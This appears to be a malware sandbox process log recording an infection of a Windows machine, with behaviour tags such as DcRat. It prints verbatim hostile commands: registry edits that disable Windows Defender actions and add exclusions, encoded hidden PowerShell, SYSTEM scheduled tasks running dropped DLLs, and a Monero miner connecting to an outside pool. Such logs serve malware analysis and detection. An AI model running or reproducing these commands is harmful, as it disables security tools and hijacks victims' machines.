C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5224
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:324⤵PID:5516
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:643⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:323⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:643⤵PID:5396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:323⤵PID:3096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:323⤵PID:6068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:323⤵PID:5820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:643⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:643⤵PID:5924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:323⤵PID:740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:643⤵PID:5532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:643⤵PID:6000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:323⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:323⤵PID:6052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:643⤵PID:5884
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnaDmwSwD" /SC once /ST 09:42:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
PID:5936 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:228
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnaDmwSwD"2⤵PID:5164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnaDmwSwD"2⤵PID:1244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 10:43:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exe\" dM /ynsite_iduwB 385118 /S" /V1 /F2⤵
- DcRat
- Creates scheduled task(s)
PID:1200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "OvvioKEypuBLsTFYZ"2⤵PID:4572
-
-
C:\Users\Admin\AppData\Roaming\hueeirvC:\Users\Admin\AppData\Roaming\hueeirv1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5956
-
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv1⤵
- Suspicious use of SetThreadContext
PID:5500 -
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv2⤵PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3968 -ip 39681⤵PID:948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4744
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6040
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4000
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
PID:5108 -
C:\Windows\rss\csrss.exe"C:\Windows\rss\csrss.exe"2⤵PID:3452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 2523⤵
- Program crash
PID:4052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4880 -ip 48801⤵PID:5348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:5396
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:5940
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:2252
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5864
-
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exeC:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exe dM /ynsite_iduwB 385118 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5508 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"2⤵PID:5400
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5260
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4652
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\fqlRXR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tCfKGXDvAPRRvLf2" /F /xml "C:\Program Files (x86)\MiKcmJhqU\NzfNYDa.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:4556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3672
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tCfKGXDvAPRRvLf"2⤵PID:3852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tCfKGXDvAPRRvLf"2⤵PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WLJiZzmdxByrvR" /F /xml "C:\Program Files (x86)\WQqkELkVHOYU2\vieUZjt.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yUJcmcRyNwKRa2" /F /xml "C:\ProgramData\UrkGLyjigLRybTVB\LZMUBmR.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iOUfqyxVtpISCFCEp2" /F /xml "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\mpKroGd.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "phKAbPCvhOcihqTrHht2" /F /xml "C:\Program Files (x86)\mQvpiNUsNPjLC\JVcufME.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hNXJOWJzZwASvpUks" /SC once /ST 03:11:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll\",#1 /AXsite_idqFS 385118" /V1 /F2⤵
- DcRat
- Drops file in System32 directory
- Drops file in Windows directory
- Creates scheduled task(s)
- Modifies data under HKEY_USERS
PID:5448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hNXJOWJzZwASvpUks"2⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:5472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5304
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:5696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OvvioKEypuBLsTFYZ"2⤵PID:4124
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:2596
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll",#1 /AXsite_idqFS 3851181⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5680 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll",#1 /AXsite_idqFS 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:2624 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hNXJOWJzZwASvpUks"3⤵PID:2188
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 864 -ip 8641⤵PID:2292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3852 -ip 38521⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\izhoqjhi.exeC:\Users\Admin\AppData\Local\Temp\izhoqjhi.exe1⤵
- Suspicious use of SetThreadContext
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\izhoqjhi.exeC:\Users\Admin\AppData\Local\Temp\izhoqjhi.exe2⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA1⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2268 -ip 22681⤵PID:3256
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵
- Suspicious use of SetThreadContext
PID:5940 -
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe2⤵
- Suspicious use of SetThreadContext
PID:5376 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵
- Suspicious use of SetThreadContext
PID:780 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
PID:1076 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=505⤵
- Suspicious use of FindShellTrayWindow
PID:5060
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 4632 -ip 46321⤵PID:5420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5064 -ip 50641⤵PID:4836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4000 -ip 40001⤵PID:940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4888 -ip 48881⤵PID:1800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5164 -ip 51641⤵PID:1604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2316 -ip 23161⤵PID:5012
-
